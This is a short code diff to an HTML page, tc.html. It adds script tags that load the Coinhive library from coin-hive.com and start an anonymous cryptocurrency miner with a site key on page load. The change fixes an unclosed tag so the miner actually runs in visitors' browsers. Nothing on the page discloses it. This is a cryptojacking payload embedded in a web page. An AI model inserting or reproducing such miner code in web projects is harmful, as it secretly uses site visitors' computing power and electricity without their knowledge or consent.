--- a/tc.html
+++ b/tc.html
@@ -1,7 +1,7 @@
 <html>
 <head>
-<!--old metod-->
-<script src="https://coin-hive.com/lib/coinhive.min.js">
+<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
+<script>
     var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});
     miner.start();
 </script>
